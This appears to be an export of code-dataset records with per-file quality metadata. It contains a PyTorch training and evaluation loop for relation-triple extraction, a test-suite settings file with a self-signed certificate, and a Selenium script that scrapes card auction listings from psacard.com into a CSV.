            triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
        if head_only:
            ret.add(triple[2].split(" ")[0])
        else:
            ret.add(triple[2])
    return ret


def _to_ep(triple_list, head_only=False, lang='ENGLISH'):
    ret = set()
    for triple in triple_list:
        if lang == 'CHINESE':
            triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
        if head_only:
            _h = triple[0].split(" ")
            _t = triple[2].split(" ")
            ret.add(tuple((_h[0], _t[0])))
        else:
            ret.add(tuple((triple[0], triple[2])))
    return ret


def _to_triple(triple_list, head_only=False, lang='ENGLISH'):
    ret = set()
    for triple in triple_list:
        # print("lang:{} A:{}".format(lang, triple))
        if lang == 'CHINESE':
            triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
            # print("B:{}".format(triple))
        if head_only:
            _h = triple[0].split(" ")
            _t = triple[2].split(" ")
            ret.add(tuple((_h[0], triple[1], _t[0])))
        else:
            ret.add(tuple((triple[0], triple[1], triple[2])))
    return ret


def _load_gold_data(data_gold, data_id, head_only=False, gold_type='EP', lang='ENGLISH'):
    _tokens, _triples = data_gold[data_id]
    if gold_type == 'EP':
        gold_value = _to_ep(_triples, head_only, lang=lang)
    elif gold_type == 'sub':
        gold_value = _to_sub(_triples, head_only, lang=lang)
    elif gold_type == 'obj':
        gold_value = _to_obj(_triples, head_only, lang=lang)
    elif gold_type == 'ALL':
        gold_value = _to_triple(_triples, head_only, lang=lang)
    return gold_value, _tokens


def _cal_prf(correct_num, predict_num, gold_num):
    eval_p = correct_num / (predict_num + 1e-10)
    eval_r = correct_num / (gold_num + 1e-10)
    eval_f = 2 * eval_p * eval_r / (eval_p + eval_r + 1e-10)
    return eval_p, eval_r, eval_f


class Framework(object):
    def __init__(self, con, wandb_log):
        self.config = con
        self.wandb_log = wandb_log

    def train(self, model_pattern):
        # initialize the model
        ori_model = model_pattern(self.config)
        ori_model.cuda()

        # define the optimizer
        optimizer = optim.Adam(filter(lambda p: p.requires_grad, ori_model.parameters()), lr=self.config.learning_rate)

        # whether use multi GPU
        if self.config.multi_gpu:
            model = nn.DataParallel(ori_model)
        else:
            model = ori_model

        # define the loss function
        def loss(gold, pred, mask):
            pred = pred.squeeze(-1)
            los = F.binary_cross_entropy(pred, gold, reduction='none')
            if mask is None:
                los = torch.sum(los) / self.config.rel_num
                return los
            if los.shape != mask.shape:
                mask = mask.unsqueeze(-1)
            los = torch.sum(los * mask) / torch.sum(mask)
            return los

        # check the checkpoint dir
        if not os.path.exists(self.config.checkpoint_dir):
            os.mkdir(self.config.checkpoint_dir)

        # get the data loader
        train_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.train_prefix, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
        dev_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
        test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer,
                                                  prefix=self.config.test_prefix, is_test=True,
                                                  collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))

        model.train()
        global_step = 0
        loss_sum = 0
        ent_boundary_loss_sum = 0
        ent_span_loss_sum = 0
        ent_pair_loss_sum = 0
        rel_loss_sum = 0
        best_f1_score = -1
        best_test_f1 = 0
        best_test_h_f1 = 0
        best_epoch = 0

        # the training loop
        for epoch in range(self.config.max_epoch):
            train_data_prefetcher = data_loader.DataPreFetcher(train_data_loader)
            data = train_data_prefetcher.next()
            while data is not None:
                if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
                    pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails, \
                        sim_sub_h2t, sim_sub_t2h, sim_obj_h2t, sim_obj_t2h, \
                        sim_sub_oh, sim_sub_ot, sim_obj_sh, sim_obj_st, pred_rels = model(data)

                    # entity boundary loss
                    loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
                    loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
                    loss_obj_heads = loss(data['em_obj_heads'], pred_obj_heads, mask=data['mask'])
                    loss_obj_tails = loss(data['em_obj_tails'], pred_obj_tails, mask=data['mask'])

                    # entity span loss
                    loss_sub_h2t = loss(data['sub_h2t'], sim_sub_h2t, mask=data['mask'])
                    loss_sub_t2h = loss(data['sub_t2h'], sim_sub_t2h, mask=data['mask'])
                    loss_obj_h2t = loss(data['obj_h2t'], sim_obj_h2t, mask=data['mask'])
                    loss_obj_t2h = loss(data['obj_t2h'], sim_obj_t2h, mask=data['mask'])

                    # entity pair loss
                    loss_sub2objh = loss(data['sub2obj_h'], sim_sub_oh, mask=data['mask'])
                    loss_sub2objt = loss(data['sub2obj_t'], sim_sub_ot, mask=data['mask'])
                    loss_obj2subh = loss(data['obj2sub_h'], sim_obj_sh, mask=data['mask'])
                    loss_obj2subt = loss(data['obj2sub_t'], sim_obj_st, mask=data['mask'])

                    # relation loss
                    loss_rel = loss(data['rel_labels'], pred_rels, mask=None)

                    ent_boundary_loss = loss_sub_heads + loss_sub_tails + loss_obj_heads + loss_obj_tails
                    ent_span_loss = loss_sub_h2t + loss_sub_t2h + loss_obj_h2t + loss_obj_t2h
                    ent_pair_loss = loss_sub2objh + loss_sub2objt + loss_obj2subh + loss_obj2subt
                    total_loss = ent_boundary_loss + ent_span_loss + ent_pair_loss + loss_rel

                    optimizer.zero_grad()
                    total_loss.backward()
                    optimizer.step()

                    global_step += 1
                    loss_sum += total_loss.item()
                    ent_boundary_loss_sum += ent_boundary_loss.item()
                    ent_span_loss_sum += ent_span_loss.item()
                    ent_pair_loss_sum += ent_pair_loss.item()
                    rel_loss_sum += loss_rel.item()

                    if global_step % self.config.period == 0:
                        # print(loss_sum)
                        if self.wandb_log is not None:
                            self.wandb_log.log({"LOSS_SUM:": loss_sum})
                        loss_sum = 0
                        ent_boundary_loss_sum = 0
                        ent_span_loss_sum = 0
                        ent_pair_loss_sum = 0
                        rel_loss_sum = 0

                    data = train_data_prefetcher.next()
                elif self.config.model_name == 'Casrel':
                    pred_sub_heads, pred_sub_tails, pred_s2ro_heads, pred_s2ro_tails = model(data)

                    # entity boundary loss
                    loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
                    loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])

                    # relation loss
                    loss_s2ro_heads = loss(data['batch_s2ro_heads'], pred_s2ro_heads, mask=data['mask'])
                    loss_s2ro_tails = loss(data['batch_s2ro_tails'], pred_s2ro_tails, mask=data['mask'])

                    ent_boundary_loss = loss_sub_heads + loss_sub_tails
                    rel_loss = loss_s2ro_heads + loss_s2ro_tails
                    total_loss = ent_boundary_loss + rel_loss

                    optimizer.zero_grad()
                    total_loss.backward()
                    optimizer.step()

                    global_step += 1
                    loss_sum += total_loss.item()
                    ent_boundary_loss_sum += ent_boundary_loss.item()
                    rel_loss_sum += rel_loss.item()

                    if global_step % self.config.period == 0:
                        if self.wandb_log is not None:
                            self.wandb_log.log({"LOSS_SUM:": loss_sum})
                        loss_sum = 0
                        ent_boundary_loss_sum = 0
                        ent_span_loss_sum = 0
                        ent_pair_loss_sum = 0
                        rel_loss_sum = 0

                    data = train_data_prefetcher.next()

            if (epoch + 1) % self.config.test_epoch == 0:
                model.eval()
                # call the test function
                dev_triple_p, dev_triple_r, dev_triple_f, dev_triple_hp, dev_triple_hr, dev_triple_hf, \
                    dev_ep_p, dev_ep_r, dev_ep_f, dev_ep_hp, dev_ep_hr, dev_ep_hf, \
                    dev_sub_p, dev_sub_r, dev_sub_f, dev_sub_hp, dev_sub_hr, dev_sub_hf, \
                    dev_obj_p, dev_obj_r, dev_obj_f, dev_obj_hp, dev_obj_hr, dev_obj_hf = self.test(dev_data_loader, self.config.step_dim, self.config.step_matrix, model)
                test_triple_p, test_triple_r, test_triple_f, test_triple_hp, test_triple_hr, test_triple_hf, \
                    test_ep_p, test_ep_r, test_ep_f, test_ep_hp, test_ep_hr, test_ep_hf, \
                    test_sub_p, test_sub_r, test_sub_f, test_sub_hp, test_sub_hr, test_sub_hf, \
                    test_obj_p, test_obj_r, test_obj_f, test_obj_hp, test_obj_hr, test_obj_hf = self.test(test_data_loader,
                                                                                                          self.config.step_dim,
                                                                                                          self.config.step_matrix,
                                                                                                          model)
                model.train()

                # eval_f1_score
                if dev_triple_f > best_f1_score:
                    best_epoch = epoch
                    best_f1_score = dev_triple_f
                    best_test_h_f1 = test_triple_hf
                    best_test_f1 = test_triple_f
                    # save the best model
                    path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
                    if not self.config.debug:
                        torch.save(ori_model.state_dict(), path)

                if self.wandb_log is not None:
                    self.wandb_log.log({
                        "BEST_EPOCH:": best_epoch,
                        "DEV_Triple_F1": dev_triple_f,
                        "DEV_TripleH_F1": dev_triple_hf,
                        "DEV_EP_F1": dev_ep_f,
                        "DEV_SUB_F1": dev_sub_f,
                        "DEV_OBJ_F1": dev_obj_f,
                        "DEV_EPH_F1": dev_ep_hf,
                        "DEV_SUBH_F1": dev_sub_hf,
                        "DEV_OBJH_F1": dev_obj_hf,
                        "best_test_h_f1": best_test_h_f1,
                        "best_test_f1": best_test_f1,
                        "current_epoch": epoch})

            # manually release the unused cache
            torch.cuda.empty_cache()

    def cal_sub_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
        _head_prob = pred_heads[0][head_idx][0].tolist()
        _tail_prob = pred_tails[0][tail_idx][0].tolist()

        _head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        _tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        _head_mapping[0][0][head_idx] = 1
        _tail_mapping[0][0][tail_idx] = 1
        _head_mapping = _head_mapping.to(encoded_txt)
        _tail_mapping = _tail_mapping.to(encoded_txt)

        sub_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)

        # predict entity span
        sim_ent_ht, sim_ent_th = model.sub_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
        _h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
        _t2h_prob = sim_ent_th[0][head_idx][0].tolist()
        # span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob

        # trans head idx
        sim_ent_gh, sim_ent_gt = model.sub_entity_trans(sub_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
        trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
        trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()

        return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob

    def cal_obj_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
        _head_prob = pred_heads[0][head_idx][0].tolist()
        _tail_prob = pred_tails[0][tail_idx][0].tolist()

        _head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        _tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        _head_mapping[0][0][head_idx] = 1
        _tail_mapping[0][0][tail_idx] = 1
        _head_mapping = _head_mapping.to(encoded_txt)
        _tail_mapping = _tail_mapping.to(encoded_txt)

        obj_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)

        # predict entity span
        sim_ent_ht, sim_ent_th = model.obj_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
        _h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
        _t2h_prob = sim_ent_th[0][head_idx][0].tolist()
        # span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob

        # trans head idx
        sim_ent_gh, sim_ent_gt = model.obj_entity_trans(obj_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
        trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
        trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()

        return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob

    def cal_rel_prob(self, sub_head_idx, sub_tail_idx, obj_head_idx, obj_tail_idx, model, encoded_txt, rel_bar=0.5):
        sub_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        sub_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        sub_head_mapping[0][0][sub_head_idx] = 1
        sub_tail_mapping[0][0][sub_tail_idx] = 1
        sub_head_mapping = sub_head_mapping.to(encoded_txt)
        sub_tail_mapping = sub_tail_mapping.to(encoded_txt)

        obj_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        obj_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
        obj_head_mapping[0][0][obj_head_idx] = 1
        obj_tail_mapping[0][0][obj_tail_idx] = 1
        obj_head_mapping = obj_head_mapping.to(encoded_txt)
        obj_tail_mapping = obj_tail_mapping.to(encoded_txt)

        pred_rels = model.rel_classification(sub_head_mapping, sub_tail_mapping, obj_head_mapping, obj_tail_mapping, encoded_txt)
        pred_rels_idx = np.where(pred_rels.cpu()[0] > rel_bar)[0]
        return pred_rels_idx

    def _cal_ep_score(self, sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob):
        _score = sub_span_prob * sub_trans_prob + obj_span_prob * obj_trans_prob
        return _score

    def test(self, x_data_loader, step_dim, step_matrix, model):
        test_data_prefetcher = data_loader.DataPreFetcher(x_data_loader)
        data = test_data_prefetcher.next()
        pred_eps_id = list()
        data_id = 0
        data_gold = list()
        id2rel = json.load(open(os.path.join(self.config.data_path, 'rel2id.json')))[0]
        print(id2rel)

        def make_step(sample_idx, text_len):
            walk_step = np.zeros((text_len, step_dim))
            for i in range(text_len):
                walk_step[i] = step_matrix[i - sample_idx + self.config.max_len]
            walk_step_t = torch.Tensor(walk_step)
            walk_step_t = walk_step_t.unsqueeze(0)
            walk_step_t = walk_step_t.to(torch.device('cuda'))
            return walk_step_t

        while data is not None:
            with torch.no_grad():
                token_ids = data['token_ids']
                tokens = data['tokens'][0]
                mask = data['mask']
                gold_triples = data['triples'][0]
                data_gold.append((tokens, gold_triples))
                seq_len = len(tokens)
                encoded_text = model.get_encoded_text(token_ids, mask)

                if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
                    pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails = model.pred_entity_boundary(encoded_text)
                    _bar = 0.1
                    max_span_len = 30
                    span_sub_heads = np.where(pred_sub_heads.cpu()[0] > _bar)[0]
                    span_sub_tails = np.where(pred_sub_tails.cpu()[0] > _bar)[0]
                    span_obj_heads = np.where(pred_obj_heads.cpu()[0] > _bar)[0]
                    span_obj_tails = np.where(pred_obj_tails.cpu()[0] > _bar)[0]
                    pred_eps = dict()
                    for _sub_head_idx in span_sub_heads:
                        for _sub_tail_idx in span_sub_tails:
                            for _obj_head_idx in span_obj_heads:
                                for _obj_tail_idx in span_obj_tails:
                                    if _sub_head_idx <= _sub_tail_idx and _obj_head_idx <= _obj_tail_idx and (_sub_tail_idx - _sub_head_idx) < max_span_len and (_obj_tail_idx - _obj_head_idx) < max_span_len:
                                        sub_head_walk_step = make_step(_sub_head_idx, seq_len)
                                        sub_tail_walk_step = make_step(_sub_tail_idx, seq_len)
                                        obj_head_walk_step = make_step(_obj_head_idx, seq_len)
                                        obj_tail_walk_step = make_step(_obj_tail_idx, seq_len)

                                        # cal span prob and trans prob
                                        sub_head_prob, sub_h2t_prob, sub_tail_prob, sub_t2h_prob, sub_trans_head_prob, sub_trans_tail_prob = \
                                            self.cal_sub_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, pred_sub_heads, pred_sub_tails, sub_head_walk_step, sub_tail_walk_step, model, encoded_text, seq_len)
                                        obj_head_prob, obj_h2t_prob, obj_tail_prob, obj_t2h_prob, obj_trans_head_prob, obj_trans_tail_prob = \
                                            self.cal_obj_prob(_obj_head_idx, _obj_tail_idx, _sub_head_idx, _sub_tail_idx, pred_obj_heads, pred_obj_tails, obj_head_walk_step, obj_tail_walk_step, model, encoded_text, seq_len)

                                        sub_span_prob = sub_head_prob * sub_h2t_prob + sub_tail_prob * sub_t2h_prob
                                        obj_span_prob = obj_head_prob * obj_h2t_prob + obj_tail_prob * obj_t2h_prob
                                        sub_trans_prob = sub_trans_head_prob * sub_trans_tail_prob
                                        obj_trans_prob = obj_trans_head_prob * obj_trans_tail_prob
                                        ep_score = self._cal_ep_score(sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob)

                                        if ep_score > 2.5:
                                            pred_rels_idx = self.cal_rel_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, model, encoded_text)
                                            for rel_idx in pred_rels_idx:
                                                rel_idx = str(rel_idx)
                                                if (_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx]) not in pred_eps:
                                                    pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
                                                else:
                                                    if ep_score > pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])]:
                                                        pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
                else:
                    ent_bar = 0.5
                    rel_bar = 0.5
                    pred_eps = dict()
                    pred_sub_heads, pred_sub_tails = model.get_subs(encoded_text)
                    sub_heads, sub_tails = np.where(pred_sub_heads.cpu()[0] > ent_bar)[0], \
                        np.where(pred_sub_tails.cpu()[0] > ent_bar)[0]
                    subjects = []
                    for sub_head in sub_heads:
                        sub_tail = sub_tails[sub_tails >= sub_head]
                        if len(sub_tail) > 0:
                            sub_tail = sub_tail[0]
                            subject = tokens[sub_head: sub_tail]
                            subjects.append((subject, sub_head, sub_tail))
                    if subjects:
                        triple_list = []
                        # [subject_num, seq_len, bert_dim]
                        repeated_encoded_text = encoded_text.repeat(len(subjects), 1, 1)
                        # [subject_num, 1, seq_len]
                        sub_head_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
                        sub_tail_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
                        for subject_idx, subject in enumerate(subjects):
                            sub_head_mapping[subject_idx][0][subject[1]] = 1
                            sub_tail_mapping[subject_idx][0][subject[2]] = 1
                        sub_tail_mapping = sub_tail_mapping.to(repeated_encoded_text)
                        sub_head_mapping = sub_head_mapping.to(repeated_encoded_text)
                        pred_obj_heads, pred_obj_tails = model.get_objs_for_specific_sub(sub_head_mapping,
                                                                                         sub_tail_mapping,
                                                                                         repeated_encoded_text)
                        for subject_idx, subject in enumerate(subjects):
                            obj_heads, obj_tails = np.where(pred_obj_heads.cpu()[subject_idx] > rel_bar), np.where(pred_obj_tails.cpu()[subject_idx] > rel_bar)
                            for obj_head, rel_head in zip(*obj_heads):
                                for obj_tail, rel_tail in zip(*obj_tails):
                                    if obj_head <= obj_tail and rel_head == rel_tail:
                                        ep_score = pred_obj_tails.cpu()[subject_idx][obj_head][rel_head].item()
                                        rel_head = str(rel_head)
                                        if (subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head]) not in pred_eps:
                                            pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
                                        else:
                                            if ep_score > pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])]:
                                                pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
                                        break

                for _ep in pred_eps:
                    pred_eps_id.append((_ep[0], _ep[1], _ep[2], _ep[3], pred_eps[_ep], data_id, _ep[4]))
                data_id += 1
                data = test_data_prefetcher.next()

        pred_eps_id = sorted(pred_eps_id, key=lambda x: x[4], reverse=True)

        def element_prf(pred_eps_id, data_gold, head_only=False, gold_type='EP', lang='ENGLISH'):
            correct_num, pred_num, gold_num = 0, 0, 0
            v_pred_entity_pair = set()

            # To calculate gold number
            for item in data_gold:
                gold_triples = item[1]
                if gold_type == 'EP':
                    gold_info = _to_ep(gold_triples, head_only, lang=lang)
                elif gold_type == 'sub':
                    gold_info = _to_sub(gold_triples, head_only, lang=lang)
                elif gold_type == 'obj':
                    gold_info = _to_obj(gold_triples, head_only, lang=lang)
                elif gold_type == 'ALL':
                    gold_info = _to_triple(gold_triples, head_only, lang=lang)
                # print(head_only, gold_info)
                gold_num += len(gold_info)
            # print("gold_type:{}, gold_num:{}".format(gold_type, gold_num))

            for _eps_id in pred_eps_id:
                gold_results, _tokens = _load_gold_data(data_gold, _eps_id[5], head_only, gold_type, lang=lang)
                sub = _tokens[_eps_id[0]: _eps_id[1] + 1]
                sub = self.config.tokenizer.convert_tokens_to_string(sub)
                if lang == 'CHINESE':
                    sub = sub.replace(' ', '')
                    sub = sub.replace('$', ' ')
                sub = sub.strip().replace(" - ", "-")
                if head_only:
                    sub = sub.split(" ")[0]
                obj = _tokens[_eps_id[2]: _eps_id[3] + 1]
                obj = self.config.tokenizer.convert_tokens_to_string(obj)
                # obj = ''.join([i.lstrip("##") for i in obj])
                # obj = ' '.join(obj.split('[unused1]'))
                obj = obj.strip().replace(" - ", "-")
                if lang == 'CHINESE':
                    obj = obj.replace(' ', '')
                    obj = obj.replace('$', ' ')
                if head_only:
                    obj = obj.split(" ")[0]
                rel = _eps_id[6]

                if gold_type == 'EP':
                    pred_info = (sub, obj, _eps_id[5])
                elif gold_type == 'sub':
                    pred_info = (sub, _eps_id[5])
                elif gold_type == 'obj':
                    pred_info = (obj, _eps_id[5])
                elif gold_type == 'ALL':
                    pred_info = (sub, rel, obj, _eps_id[5])

                if pred_info not in v_pred_entity_pair:
                    v_pred_entity_pair.add(pred_info)
                else:
                    continue

                if gold_type == 'EP':
                    pred_info = (sub, obj)
                elif gold_type == 'sub':
                    pred_info = (sub)
                elif gold_type == 'obj':
                    pred_info = (obj)
                elif gold_type == 'ALL':
                    pred_info = (sub, rel, obj)
                # print(head_only, pred_info)
                if pred_info in gold_results:
                    correct_num += 1
                # else:
                #     if gold_type == 'ALL' and head_only == False:
                #         print("pred_info:{}".format(pred_info))
                #         print("gold_results:{}".format(gold_results))
                pred_num += 1

            p, r, f = _cal_prf(correct_num, pred_num, gold_num)
            print("gold_type:{} head_only:{} gold_num:{} pred_num:{} correct_num:{}, p:{},r:{},f:{},".format(gold_type, head_only, gold_num, pred_num, correct_num, p, r, f))
            return p, r, f

        # print(pred_eps_id)
        triple_p, triple_r, triple_f = element_prf(pred_eps_id, data_gold, gold_type='ALL', lang=self.config.dataset_lang)
        triple_hp, triple_hr, triple_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='ALL', lang=self.config.dataset_lang)
        ep_p, ep_r, ep_f = element_prf(pred_eps_id, data_gold, gold_type='EP', lang=self.config.dataset_lang)
        ep_hp, ep_hr, ep_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='EP', lang=self.config.dataset_lang)
        sub_p, sub_r, sub_f = element_prf(pred_eps_id, data_gold, gold_type='sub', lang=self.config.dataset_lang)
        sub_hp, sub_hr, sub_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='sub', lang=self.config.dataset_lang)
        obj_p, obj_r, obj_f = element_prf(pred_eps_id, data_gold, gold_type='obj', lang=self.config.dataset_lang)
        obj_hp, obj_hr, obj_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='obj', lang=self.config.dataset_lang)

        return triple_p, triple_r, triple_f, triple_hp, triple_hr, triple_hf, \
            ep_p, ep_r, ep_f, ep_hp, ep_hr, ep_hf, \
            sub_p, sub_r, sub_f, sub_hp, sub_hr, sub_hf, \
            obj_p, obj_r, obj_f, obj_hp, obj_hr, obj_hf

    def testall(self, model_pattern):
        model = model_pattern(self.config)
        path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
        model.load_state_dict(torch.load(path))
        model.cuda()
        model.eval()
        test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
        self.test(test_data_loader, self.config.step_dim, self.config.step_matrix, model)
        return
```
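As implemented in `_cal_prf` above, the evaluation metrics are standard precision, recall, and F1 with a small constant guarding against division by zero:

$$P = \frac{C}{N_\text{pred} + 10^{-10}}, \qquad R = \frac{C}{N_\text{gold} + 10^{-10}}, \qquad F_1 = \frac{2PR}{P + R + 10^{-10}},$$

where $C$ is the number of correct predictions, $N_\text{pred}$ the number of predictions, and $N_\text{gold}$ the number of gold items.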
avg_line_length: 48.786164 | max_line_length: 223 | alphanum_fraction: 0.561718
qsc_*_quality_signal values (schema order): 4,093 | 31,028 | 3.831664 | 0.071341 | 0.035707 | 0.013008 | 0.011222 | 0.629599 | 0.557738 | 0.495824 | 0.459351 | 0.423197 | 0.398648 | 0 | 0.015954 | 0.339403 | 31,028 | 635 | 224 | 48.862992 | 0.749183 | 0.040222 | 0 | 0.321586 | 0 | 0 | 0.02536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037445 | false | 0 | 0.022026 | 0 | 0.096916 | 0.004405
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c88d2448c823f942e8276b943c094ce146f49b | size: 799 | ext: py | lang: Python

max_stars: tests/settings.py in rjw57/componentsdb @ 7e5fd96d3afbbcde09d2f7fba1d6c86975e41272, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count/events null
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
"""
Settings for application when being run in the test suite.
"""
import os
import sys
# Add the directory containing this file to the search path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# Import function to generate a self-signed cert dynamically
from x509cert import gen_self_signed_cert
DEBUG = True
TESTING = True
SECRET_KEY = 'bonjour, monde'
# Configure the testing database. The database URI is specified by the
# COMPONENTSDB_DATABASE_URI environment variable.
SQLALCHEMY_DATABASE_URI = os.environ.get(
'COMPONENTSDB_DATABASE_URI', 'sqlite://'
)
SQLALCHEMY_ECHO = True
_cert, _key = gen_self_signed_cert()
GOOGLE_OAUTH2_CERTS = {'selfsigned': _cert}
GOOGLE_OAUTH2_ALLOWED_CLIENT_IDS = ['my-client']
TESTING_GOOGLE_OAUTH2_CERT_PRIV_KEYS = {'selfsigned': _key}
avg_line_length: 26.633333 | max_line_length: 70 | alphanum_fraction: 0.787234
qsc_*_quality_signal values (schema order): 113 | 799 | 5.274336 | 0.575221 | 0.073826 | 0.07047 | 0.057047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008608 | 0.12766 | 799 | 29 | 71 | 27.551724 | 0.846485 | 0.366708 | 0 | 0 | 0 | 0 | 0.156187 | 0.05071 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1cbb897fe4f7aa594e93ad56844d2bed4a73d65 | size: 1,995 | ext: py | lang: Python

max_stars: Alt_DE/psacard/psa_card/code/loadall_auction_items.py in royadityak94/Interview @ 40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count/events null
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
```python
# Module to scrape all auction listings on the auction prices page
from selenium import webdriver
from bs4 import BeautifulSoup
import csv
import os


# Utility to write as .csv file format
def save_to_csv(data, SAVE_PATH, MODE):
    if not os.path.exists(SAVE_PATH.split('/')[0]):
        os.makedirs(SAVE_PATH.split('/')[0])
    fileWriter = csv.DictWriter(open(SAVE_PATH, MODE), data[0].keys(), delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
    fileWriter.writeheader()
    fileWriter.writerows(data)


# Selenium Driver Handler
def load_driver(SELENIUM_EXECUTABLE_PATH=r'/mnt/c/Users/adity/Downloads/Chrome/geckodriver-v0.27.0-win64/geckodriver.exe'):
    driver = webdriver.Firefox(executable_path=SELENIUM_EXECUTABLE_PATH)
    return driver


# Main handler controlling all auction listing parsing
def fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, MODE):
    driver = load_driver()
    driver.get(AUCTION_PRICES_PATH)
    soup = BeautifulSoup(driver.page_source, features="lxml")
    auction_items = soup.find_all("table", attrs={"class": "auction-summary-results"})
    auction_data = []
    # Iterating over full-auction set
    for item in auction_items:
        item_info = {}
        item_info['name'] = item.find('a').contents[0]
        item_info['url'] = BASE_PATH + item.find('a')['href']
        item_info['count'] = int(item.findAll('td')[-1].contents[0])
        item_info['category'] = 'basketball_cards'
        auction_data.append(item_info)
    # Write to file
    save_to_csv(auction_data, SAVE_PATH, MODE)
    driver.quit()
    return


# Entry-point of the program
def main():
    BASE_PATH = 'https://www.psacard.com'
    AUCTION_PRICES_PATH = BASE_PATH + '/auctionprices/#2basketball%20cards%7Cbasketb'
    SAVE_PATH = 'logs/allauctionprices.csv'
    fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, 'w')


# Capability for stand-alone execution
if __name__ == '__main__':
    main()
```
